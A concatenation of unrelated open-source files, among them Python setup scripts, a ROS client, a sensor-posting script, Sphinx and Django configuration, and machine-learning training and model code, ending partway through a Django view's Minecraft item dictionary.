25186efeae2e482cb55a1c90ce296d3a932ba232 | e757b98dccb9f29c0a22be3e938c89e7fe40e9b1 | /setup.py | 49304b0917c3fe4fc7045f9786551b4832c892e0 | [] | no_license | tipmeet/tippresence | bb031ebfc23fa5fc067ef0ea53767fcbb45e7bf4 | 2a512c1586bae89927e84ab5a163e6eac51dbfc0 | refs/heads/master | 2021-01-18T05:28:42.447009 | 2011-07-19T08:22:04 | 2011-07-19T08:22:04 | 1,389,392 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 847 | py | #!/usr/bin/env python
from setuptools import setup, find_packages
if __name__ == '__main__':
setup(
name='tippresence',
description='Presence server with SIP/HTTP interfaces written in Twisted Python',
license='MIT',
url = 'http://github.com/ivaxer/tippresence',
keywords = "SIP VoIP",
author='John Khvatov',
author_email='ivaxer@imarto.net',
install_requires = ['tipsip'],
packages = find_packages(),
test_suite='tippresence.tests',
package_data = {
'tippresence.amqp': ['amqp0-8.xml'],
},
data_files = [
('/etc/tippresence', ['etc/tippresence/tippresence.tac']),
('/etc/init', ['etc/init/tippresence.conf']),
],
)
| [
"ivaxer@imarto.net"
] | ivaxer@imarto.net |
741329c6619ac5059c1d42a35814dc330de3165e | cdb26c82ceadb29752c6390bcb6511266d22af94 | /prompts.py | b2ed6457caf5318604b453bd515ef9d609b92886 | [] | no_license | raghukotha/kuvanassist | b0d3531b6452b7f2373345decdce76f123d3bd2e | cd697357f6f838810540d3f7c75688828cb22725 | refs/heads/master | 2022-06-01T00:53:39.041047 | 2020-05-03T00:01:14 | 2020-05-03T00:01:14 | 260,300,871 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 417 | py | KUVAN_WELCOME_MESSAGE = """
Welcome to KUVAN Assist. I am Your personal assistant and am here to help support
you with your KUVAN Treatment. This setup exercise will take less than five minutes.
Let us get started. You can get started by saying I am now taking medication KUVAN.
"""
KUVAN_YOU_WANT_METO_REMIND = 'So you want me to remind about medication. Is that right? If so please say "Create reminder".'
| [
"raghu_kotha@yahoo.com"
] | raghu_kotha@yahoo.com |
e6f091efcc919fd2b66d19efe2d9162e7d7f49bc | 076459cf0f988048952fcf28cb6695ca41a255cc | /ogretici_paket/scripts/zaman_client.py | bf96da305b1f0ff219204c9aa227a7ad9a4226f3 | [] | no_license | moguztas/uygulamalarla_ros | f8007ac9747b888125a577084c2dd53ace7110d7 | 6cf350fc8900da9d6502c85cd935cee6574a4535 | refs/heads/master | 2023-01-30T17:52:08.491600 | 2020-12-06T18:19:44 | 2020-12-06T18:19:44 | 272,462,642 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 566 | py | #!/usr/bin/env python
import sys
import rospy
from ogretici_paket.srv import GecenZaman
def istekte_bulun(x):
rospy.wait_for_service('zaman')
try:
sure_hesapla = rospy.ServiceProxy('zaman', GecenZaman)
cevap = sure_hesapla(x)
return cevap.gecen_sure
except rospy.ServiceException:
pass
if __name__ == "__main__":
if len(sys.argv) == 2:
x = int(sys.argv[1])
else:
sys.exit(1)
print ("Gidilecek mesafe: %d metre"%(x))
print ("Hedefe varana kadar gecen sure: %d saniye."%(istekte_bulun(x))) | [
"noreply@github.com"
] | moguztas.noreply@github.com |
25967920e75910dd4dbb5fa762724521d721d10c | ae300efd9706d1facfb1150dd23dbdf25a7307ad | /app/discrete/App.py | 7bec4d3b3d7fa5aaae7e9ebf37131d3a7d62da58 | [] | no_license | markreha/cloudpi | 7b3e3ad4421cc2a676463d9e2b24b2f79068a09d | 416d131053309712690178be9ecec706a0fbf59f | refs/heads/master | 2021-11-01T17:09:00.305664 | 2021-10-07T14:26:50 | 2021-10-07T14:26:50 | 95,674,778 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,522 | py | import Config as cfg
from TemperatureSensor import TemperatureSensor
from LED import LED
import datetime
import json
import requests
import time
# Load the current Environment Configuration
print("Running Sensor Application v0.1")
if cfg.environment == "dev1":
print("Running Dev 1 Environment Configuration")
environment = cfg.env_dev1
elif cfg.environment == "dev2":
print("Running Dev 2 Environment Configuration")
environment = cfg.env_dev2
elif cfg.environment == "qa":
print("Running QA Environment Configuration")
environment = cfg.env_qa
else:
print("Running Production Environment Configuration")
environment = cfg.env_prod
# Application constants from Environment and Configuration file
sampleTime = cfg.sampleTime
debug = cfg.debug
deviceID = cfg.deviceID
webApiUrl = environment["webApi"]
webApiUsername = environment["username"]
webApiPassword = environment["password"]
# Create an indicator LED on GPIO pin 17
led = LED(17)
# Create the Temperature Sensor on GPIO pin 4
temperatureSensor = TemperatureSensor(4)
# Dictionary to hold Temperature Sensor data
temperatureData = {}
# Sit in a loop reading the sensors every sampleTime, convert result to JSON, and POST to the Web API
while True:
# Turn LED ON
led.on()
# Read the Temperature Sensor
temperatureSensor.read()
if temperatureSensor.valid:
# Save the Temperature Sensor results in a Temperature Data Object
temperatureData["deviceID"] = deviceID
temperatureData["temperature"] = temperatureSensor.temperatureF
temperatureData["humidity"] = temperatureSensor.humidity
temperatureData["pressure"] = 0
# Print results to the console if in debug mode
if debug:
print("Sampled at %s Temperature: %.2f F Humidity: %.2f" % (str(datetime.datetime.now()), temperatureData["temperature"], temperatureData["humidity"]))
# Convert the Temperature Data Object to JSON string
strj = json.dumps(temperatureData, ensure_ascii=False)
# POST the JSON results to the RESTful Web API using HTTP Basic Authentication
response = requests.post(webApiUrl, strj, headers={'Content-Type':'application/json'}, auth=(webApiUsername, webApiPassword))
if response.status_code == 200:
strj = response.json()
print("Response status is %s with message of %s" % (strj["status"], strj["message"]))
else:
print("Response Error: %d" % response.status_code)
else:
print("Temperature Sensor Error")
# Turn LED OFF
led.off()
# Sleep until we need to read the sensors again
time.sleep(sampleTime)
| [
"mark@Marks-MacBook-Pro.local"
] | mark@Marks-MacBook-Pro.local |
201617e3c98c2c8d3e7e7f717bff300bc4405cf3 | c70b0685c47059ce690e0390054d085af58eb0a7 | /docs/conf.py | 72e5bbb0598f62006e4fdbbe12e9b05be0ef89b6 | [
"MIT"
] | permissive | tayfun/bilgisayfam | 13ede05f116c3ffa5c9ecfcaa09ab9eb0410b7c1 | f2f9942be53abefc1caf31509553c46957195535 | refs/heads/master | 2021-01-01T19:11:27.725112 | 2014-10-05T20:52:34 | 2014-10-05T20:52:34 | 5,346,691 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,848 | py | # -*- coding: utf-8 -*-
#
# bilgisayfam_project documentation build configuration file, created by
# sphinx-quickstart on Sun Feb 17 11:46:20 2013.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = []
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'bilgisayfam_project'
copyright = u'2013, ChangeMyName'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.1'
# The full version, including alpha/beta/rc tags.
release = '0.1'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'bilgisayfam_projectdoc'
# -- Options for LaTeX output --------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'bilgisayfam_project.tex', u'bilgisayfam_project Documentation',
u'ChangeToMyName', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'bilgisayfam_project', u'bilgisayfam_project Documentation',
[u'ChangeToMyName'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output ------------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'bilgisayfam_project', u'bilgisayfam_project Documentation',
u'ChangeToMyName', 'bilgisayfam_project', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
| [
"ts@tayfunsen.com"
] | ts@tayfunsen.com |
f5f7b157ea9d5a2354c0805cea334cfac3408e7b | 0a4031c062c098811c3b419b94ccf96724439107 | /json-quiz/3.py | 3792c2d4d8cd12eef82fce1a96bcc06d32b59ffc | [] | no_license | dflatow/compjour-hw | d934ac6b9d22ca923100d023809fa32103e8e74a | 4a26854769c31536247acb41b35f32fb55ab1e59 | refs/heads/master | 2020-05-05T03:17:49.699470 | 2015-06-02T02:15:55 | 2015-06-02T02:15:55 | 33,497,085 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 662 | py | import requests
import json
data_url = "http://www.compjour.org/files/code/json-examples/maps.googleapis-geocode-mcclatchy.json"
# fetch the data file
response = requests.get(data_url)
text = response.text
# parse the data
data = json.loads(text)
print('A.', data['results'][0]['formatted_address'])
print('B.', data['status'])
print('C.', data['results'][0]['geometry']['location_type'])
print('D.', data['results'][0]['geometry']['location']['lat'])
print('E.', data['results'][0]['geometry']['viewport']['southwest']['lng'])
num_to_print = 2
sep = ', '
print('F.', sep.join([x['long_name'] for x in data['results'][0]['address_components'][:num_to_print]])) | [
"daflatow@gmail.com"
] | daflatow@gmail.com |
6c39c3e981abfb7cb8b41215d557e2d06b0646ad | b50f93b1b0a5955e80a9f86816eb439edc280ef1 | /train.py | 87e3c2af76575c66f9e956609543f276b758b8e8 | [] | no_license | falcong/DAE_impute | aba8a9703a2bbefc4f4a4b94fd19438b644e8cfb | 7314d592adbe2e3947673fc55d874d0543f3a205 | refs/heads/master | 2022-07-13T21:54:58.555657 | 2020-05-13T16:46:01 | 2020-05-13T16:46:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,954 | py | import argparse
import os
import torch
from data import MissDataset, MissDataLoader
from TCDAE import TCDAE
from utils import *
import random
import math
import torch.nn as nn
import torch.nn.utils.rnn as rnn
import torch.utils.data as data
import torch.nn.functional as F
from torch.autograd import Variable
import numpy as np
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
parser = argparse.ArgumentParser(
"Time series missing data imputation"
"with Temporal Convolutional Denoising Autoencoder")
parser.add_argument('--train_path', type=str, default='./input/air.npy',
help='directory of train data, with npy format')
parser.add_argument('--B', default=128, type=int,
help='Number of channels in bottleneck 1 × 1-conv block')
parser.add_argument('--H', default=128, type=int,
help='Number of channels in convolutional blocks')
parser.add_argument('--P', default=3 , type=int,
help='Kernel size in convolutional blocks')
parser.add_argument('--L', default=2, type=int,
help='Number of convolutional blocks in each repeat')
parser.add_argument('--R', default=2, type=int,
help='Number of repeats')
parser.add_argument('--C', default=0.2, type=float,
help='Probability of dropout in input layer')
parser.add_argument('--epochs', default=10, type=int,
help='Number of maximum epochs')
parser.add_argument('--lr', default=1e-4, type=float,
help='Init learning rate')
parser.add_argument('--l2', default=1e-3, type=float,
help='weight decay (L2 penalty)')
# minibatch
parser.add_argument('--shuffle', default=1, type=int,
help='reshuffle the data at every epoch')
parser.add_argument('--batch_size', default=64, type=int,
help='Batch size')
#parser.add_argument('--num_workers', default=4, type=int,
# help='Number of workers to generate minibatch')
parser.add_argument('--save_folder', default='./output/',
help='Location to save epoch models')
def train(dataLoader, args, train_z, train_m):
model = TCDAE(N=args.N, B=args.B, H=args.H, P=args.P, X=args.L, R=args.R, C=args.C)
num_param(model)
model.cuda()
model = torch.nn.DataParallel(model)
optimizer = torch.optim.Adam(model.parameters(), lr=args.lr, weight_decay=args.l2)
loss_fn = MaskLoss()
loss_list = []
best_rmse = 1e8
for epoch in range(args.epochs):
model.train()
for i, (z, m) in enumerate(dataLoader):
z = Variable(z).cuda()
m = Variable(m).cuda()
decoded = model(z, m)
loss = loss_fn(decoded, z, m)#Denosing: calculate loss by decode and complete data
#loss = loss_fn(decoded, raw_x)
optimizer.zero_grad()
loss.backward()
optimizer.step()
model.eval()
step_loss = get_step_loss(model, train_z, train_m)
loss_list.append(step_loss)
#test_rmse = get_rmse(model, train_x, train_z, train_m)
print (epoch, 'Step loss:', step_loss)#, ' Test rmse:', test_rmse)
#if best_rmse > test_rmse:
# best_rmse = test_rmse
save_path = os.path.join(args.save_folder, 'model_epoch_%d.pth' % (epoch))
torch.save(model.module, save_path)
#save(model, train_x, train_z, train_m)
#draw_curve(loss_list, 'RMSE', 'RMSE')
#print('Best Test RMSE', best_rmse)
return model
def main(args):
train_z, train_m, _, _ = MissDataLoader(args.train_path)
train_set = MissDataset(train_z, train_m)
args.N = train_z.shape[1]
train_loader = data.DataLoader(train_set, batch_size=args.batch_size, shuffle=args.shuffle)
if not os.path.exists(args.save_folder):
os.makedirs(args.save_folder)
model = train(train_loader, args, train_z, train_m)
torch.save(model.module, os.path.join(args.save_folder, 'final.pth'))
if __name__ == '__main__':
args = parser.parse_args()
print(args)
main(args)
| [
"1146628217@qq.com"
] | 1146628217@qq.com |
27d84525c635d282c71896b4d755ef60be36f03f | 55e55605975a844796e130aab44f4b5a15615207 | /Leitor/leitorXML.py | 5ab094d24f2deb1a483761519e70224165bc078f | [] | no_license | thiagoSilvaGit/PDE-NPDP | 8a6bf8726774787a45e7aa835de8c51496b54921 | 48af68c049eb1a2ee3873f7d7888d5242b68313e | refs/heads/master | 2021-05-04T05:26:11.992600 | 2021-04-09T17:21:09 | 2021-04-09T17:21:09 | 120,337,404 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 614 | py | # -*- coding: utf-8 -*-
import xmlschema
from pprint import pprint
def LerXML(arq):
xs = xmlschema.XMLSchema('instancia2.xsd')
#print "XML válido: {}".format(xs.is_valid(arq))
b = xs.to_dict(arq)
#pprint(b)
my_dict = xs.to_dict(arq)
return my_dict
def LerXMLGen(arq):
xs = xmlschema.XMLSchema('gerafile.xsd')
print(xs.is_valid(arq))
pprint(xs.to_dict(arq))
my_dict = xs.to_dict(arq)
return my_dict
def LerXMLConf(arq):
xs = xmlschema.XMLSchema('conf.xsd')
print(xs.is_valid(arq))
pprint(xs.to_dict(arq))
my_dict = xs.to_dict(arq)
return my_dict
| [
"thiagoSilvaGit@users.noreply.github.com"
] | thiagoSilvaGit@users.noreply.github.com |
59b0fbaaadba789abda8ee705a64c83eb5c623dd | ff80369ce7fdd6229ee79849b44e780d8639b5fa | /model/woz_model.py | 73d1b537dd0d5e5bedbc60b326c9d2a933d46717 | [] | no_license | YourThomasLee/DSTer | 5878717611fc9dcab3360ca3d4162f5efc691b22 | 9f0efbf5a0d1f558dc9d02aa05dd8e05c853fcb1 | refs/heads/master | 2023-09-01T19:54:15.736185 | 2023-08-18T10:00:42 | 2023-08-18T10:00:42 | 230,451,913 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,231 | py | # -*- encoding: utf-8 -*-
from transformers import AutoModel
import torch
import torch.nn as nn
import torch.nn.functional as F
from copy import deepcopy as c
from base import BaseModel
from trainer.data_loaders import tokenizer
from model.attention import MultiHeadedAttention
from model.feed_forward_net import FeedForwardNet
def clones(module, N):
"Produce N identical layers."
return nn.ModuleList([c(module) for _ in range(N)])
class WozEmbedding(nn.Module):
def __init__(self, bert_name, d_model, dropout):
super(WozEmbedding, self).__init__()
self.bert_layer = AutoModel.from_pretrained(bert_name)
self.bert_layer.resize_token_embeddings(len(tokenizer))
def forward(self, context_ids, cur_utt_ids, pre_states_ids):
context_embed = self.bert_layer(context_ids)
cur_utt_embed = self.bert_layer(cur_utt_ids)
pre_states_embed = {k: self.bert_layer(v).pooler_output for k, v in pre_states_ids.items()}
embeddings = {"context": context_embed,
"cur_utt": cur_utt_embed,
"pre_states": pre_states_embed
}
return embeddings # batch_size * sentence_len * 768
class CrossLayer(nn.Module):
'''
input:
- context: user_utterrance + system_utterrance ... of previous turns => self_attention
- usr_utt: user_utterance in current turn => attention(usr_utt, context, )
- previous_states: belief_state in previous turn
- slot_gate_logit
- slot_value_logit
'''
def __init__(self, attn_heads, d_model, dropout):
super(CrossLayer, self).__init__()
self.attns = clones(MultiHeadedAttention(attn_heads, d_model, dropout), 3)
self.normalize_layer = clones(nn.Sequential(
nn.Linear(768, d_model),
nn.LayerNorm(d_model),
nn.Dropout(dropout)
),
3)
self.norms = clones(nn.LayerNorm(d_model), 2)
self.ffns = clones(FeedForwardNet(d_model, int(1.5 * d_model), dropout), 2)
def _init_weights(self, module):
if isinstance(module, (nn.Linear, nn.Embedding)):
module.weight.data.normal_(mean=0.0, std=0.02)
if isinstance(module, nn.Linear) and module.bias is not None:
module.bias.data.zero_()
elif isinstance(module, nn.LayerNorm):
module.bias.data.zero_()
module.weight.data.fill_(1.0)
def forward(self, embeddings, masks):
i = 0
fea = dict()
for k,v in embeddings.items():
if "last_hidden_state" in v.keys(): # cur_utt, context
fea[k] = self.normalize_layer[i](v['last_hidden_state'])
elif len(v.keys()) > 29: # slots
if k not in fea: fea[k] = dict()
for slot, embed in v.items():
fea[k][slot] = self.normalize_layer[i](embed)
i += 1
pred_input = dict()
# preNorm + residual connection
cur_utt_attn = fea['cur_utt'] + self.attns[0](
fea['cur_utt'], fea['context'], fea['context'],
masks['context']
)
pred_input['cur_utt'] = cur_utt_attn + self.ffns[0](self.norms[0](cur_utt_attn))
pred_input['slots_gates'] = dict()
for k,v in fea['pre_states'].items():
v_attn = v + self.attns[1](
v.unsqueeze(-2), pred_input['cur_utt'], pred_input['cur_utt'],
masks['cur_utt']
).squeeze(-2)
pred_input['slots_gates'][k] = v_attn + self.ffns[1](self.norms[1](v_attn))
return pred_input
class TaskLayer(nn.Module):
'''
input:
- context: utterance history
- usr_utt: user_utterance
- domains - slots:
- previous_states:
- cur_states:
'''
def __init__(self, slots, slots_classification, d_model, dropout):
super(TaskLayer, self).__init__()
self.is_classification = nn.Parameter(torch.tensor([1 if i in slots_classification else 0 for i in slots]), requires_grad=False)
self.gates_layer = nn.Linear(d_model, 2) # slot_gates_prediction
self.values_layer = nn.Linear(d_model, 15) # slot_value_prediction
def _init_weights(self, module):
if isinstance(module, (nn.Linear, nn.Embedding)):
module.weight.data.normal_(mean=0.0, std=0.02)
if isinstance(module, nn.Linear) and module.bias is not None:
module.bias.data.zero_()
elif isinstance(module, nn.LayerNorm):
module.bias.data.zero_()
module.weight.data.fill_(1.0)
def forward(self, input):
logits = dict()
slots_fea = torch.stack([v for k, v in input['slots_gates'].items()], dim=1)
logits['slots_gates'] = self.gates_layer(slots_fea)
logits['slots_values'] = self.values_layer(slots_fea)#.masked_fill(self.is_classification.unsqueeze(0).unsqueeze(-1) == 0, 0.0)
return logits
class WozModel(BaseModel):
def __init__(self, bert_name,
domain_slots,
slots_classification,
d_model,
dropout,
attn_heads,
**kargs
):
super(WozModel, self).__init__()
self.embedding = WozEmbedding(bert_name, d_model, dropout)
self.cross_layer = CrossLayer(attn_heads, d_model, dropout)
self.task_layer = TaskLayer(domain_slots, slots_classification, d_model, dropout)
def forward(self, batch):
embeddings = self.embedding(batch['context_ids'],
batch['cur_utt_ids'],
batch['pre_states_ids']
)
masks = {"context": batch["context_mask"],
"cur_utt": batch["cur_utt_mask"],
"pre_states": batch["pre_states_mask"],
}
pred_input = self.cross_layer(embeddings, masks)
logits = self.task_layer(pred_input)
return logits
| [
"baizhen9406@163.com"
] | baizhen9406@163.com |
ce79e3ebe49d76065f91853f41084084a188bfa6 | c738f40e7a9c2e5a9712cccd88c7f0e79b7167eb | /mysite/mysite/urls.py | 8d3e44717d88cdfda2f051a78a5eee60f4100176 | [] | no_license | sitayebsofiane/tutorial_django | f100717c563b61e87e8cfb7771c907ecdcbabf67 | 91058987ae706080dbe6c8af78b5f4636975fb74 | refs/heads/master | 2021-03-26T04:33:44.309167 | 2020-03-19T11:21:03 | 2020-03-19T11:21:03 | 247,672,834 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 879 | py | """mysite URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.conf.urls import url
from django.contrib import admin
from django.urls import include, path
from . import views
urlpatterns = [
path('polls/', include('polls.urls')),
path('admin/', admin.site.urls),
url('', views.home),
]
| [
"sitayebsofiane51@gmail.com"
] | sitayebsofiane51@gmail.com |
d630e5ba33092c584e73ad080308fae594141f6f | a0050717ec4c859f6591db7754f8738c39c4f835 | /hotel/migrations/0001_initial.py | 4ef8d84594f420380cc5b09dcc2525b15d0b124e | [] | no_license | mailysvl/loc | c208f344202280d5447f9129ef3c8ee31137ecc1 | ce3c4be036e849454d86a0b1091a3cf608f81e0c | refs/heads/master | 2020-03-24T20:36:52.757412 | 2018-07-31T08:50:33 | 2018-07-31T08:50:33 | 142,987,639 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 967 | py | # Generated by Django 2.0.1 on 2018-06-12 01:32
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Room',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('room_type', models.CharField(max_length=100)),
('description', models.TextField(blank=True, null=True)),
('room_size', models.IntegerField()),
('nightly_price', models.DecimalField(decimal_places=2, max_digits=10)),
('monthly_price', models.DecimalField(decimal_places=2, max_digits=10)),
('guests', models.IntegerField()),
('breakfast_included', models.BooleanField()),
('view', models.CharField(max_length=50)),
],
),
]
| [
"ksivilay28@gmail.com"
] | ksivilay28@gmail.com |
d341f0362017e5500d7df28450208436149a1e49 | a7d906ccb28a14c39eb986a991362930d4903661 | /Basics/basic1.py | 20e484aaab7773a5c329167cabbd509aa1db9c78 | [] | no_license | falaqm/ArtOfDoingTkinter | fe7944b2d002c39dd6d711554ec673e5a85affb6 | 7226825ecdc0e71fd507df57ffea14ca7fb57fba | refs/heads/master | 2023-03-28T01:19:48.905505 | 2021-04-01T13:14:17 | 2021-04-01T13:14:17 | 352,979,232 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 891 | py | # Labels and Pack
import tkinter as tk
# Define Window
root = tk.Tk()
root.title("Window Basics")
root.iconbitmap("hot_air_balloon.ico")
root.geometry("400x400")
root.resizable(0, 0)
root.config(bg='blue')
# Create Widgets
lbl_name_1 = tk.Label(root,text='Hello my name is Maria')
lbl_name_1.pack()
lbl_name_2 = tk.Label(root,text='Hello my name is Maria',font=('Arial',18,'bold'))
lbl_name_2.pack()
lbl_name_3 = tk.Label(root)
lbl_name_3.config(text="Hello my name is Maria")
lbl_name_3.config(font=('Cambria',10))
lbl_name_3.config(bg='#ff0077')
lbl_name_3.pack(padx=10,pady=50)
lbl_name_4 = tk.Label(root,text='Hello my name is Maria',bg="#000000",fg="green",)
lbl_name_4.pack(pady=(0,10),ipadx=50,ipady=10,anchor="w")
lbl_name_5 = tk.Label(root,text='Hello my name is Maria',bg="#ffffff",fg="#123456")
lbl_name_5.pack(fill=tk.BOTH,expand=True,padx=10,pady=10)
root.mainloop()
| [
"m2492141"
] | m2492141 |
9944b7a59ff1b20e079e84460f9acb8f095ddba7 | 68c51d14853d7a50fe28086904e89fdf6ceaeb2b | /user/views.py | a02d77889b62d4f905c4ccc18910588cdc7543c2 | [] | no_license | theballkyo/minecraft-web-py | bc52a5537b8d1bd3f782aa263a990a85a8b57837 | 9463b14218a774022f0e784249831ba7b3953ac2 | refs/heads/master | 2016-09-05T09:48:32.988994 | 2015-08-29T04:54:11 | 2015-08-29T04:54:11 | 40,349,334 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 51,052 | py | from django.shortcuts import render
from django.http import HttpResponse
from .forms import CreateForm
from .models import Account, Inv
from hashlib import sha256
import random
import string
def index(request):
return render(request, 'index.html')
def profile(request, username):
user = Inv.objects.filter(inv_player__in=[username])[0]
item = {'record_wait': {'0': {'class': 'at5 at5_97', 'name': 'Music Disk (Wait)'}, 'ID': '2267'}, 'torch': {'0': {'class': 'at1 at_6', 'name': 'Torch'}, 'ID': '50'}, 'stained_hardened_clay': {'2': {'class': 'at2 at_36', 'name': 'Stained Clay (Magenta)'}, '0': {'class': 'at2 at_34', 'name': 'Stained Clay (White)'}, '14': {'class': 'at2 at_48', 'name': 'Stained Clay (Red)'}, '10': {'class': 'at2 at_44', 'name': 'Stained Clay (Purple)'}, 'ID': '159:15', '12': {'class': 'at2 at_46', 'name': 'Stained Clay (Brown)'}, '6': {'class': 'at2 at_40', 'name': 'Stained Clay (Pink)'}, '11': {'class': 'at2 at_45', 'name': 'Stained Clay (Blue)'}, '7': {'class': 'at2 at_41', 'name': 'Stained Clay (Gray)'}, '5': {'class': 'at2 at_39', 'name': 'Stained Clay (Lime)'}, '13': {'class': 'at2 at_47', 'name': 'Stained Clay (Green)'}, '3': {'class': 'at2 at_37', 'name': 'Stained Clay (Light Blue)'}, '8': {'class': 'at2 at_42', 'name': 'Stained Clay (Light Gray)'}, '4': {'class': 'at2 at_38', 'name': 'Stained Clay (Yellow)'}, '15': {'class': 'at2 at_49', 'name': 'Stained Clay (Black)'}, '1': {'class': 'at2 at_35', 'name': 'Stained Clay (Orange)'}, '9': {'class': 'at2 at_43', 'name': 'Stained Clay (Cyan)'}}, 'redstone': {'0': {'class': 'at3 at_96', 'name': 'Redstone Dust'}, 'ID': '331'}, 'book': {'0': {'class': 'at4 at_5', 'name': 'Book'}, 'ID': '340'}, 'golden_axe': {'0': {'class': 'at3 at_51', 'name': 'Gold Axe'}, 'ID': '286'}, 'detector_rail': {'0': {'class': 'at0 at_52', 'name': 'Rail (Detector)'}, 'ID': '28'}, 'dark_oak_fence_gate': {'0': {'class': 'at3 at_13', 'name': 'Fence Gate (Dark Oak)'}, 'ID': '186'}, 'cobblestone_wall': 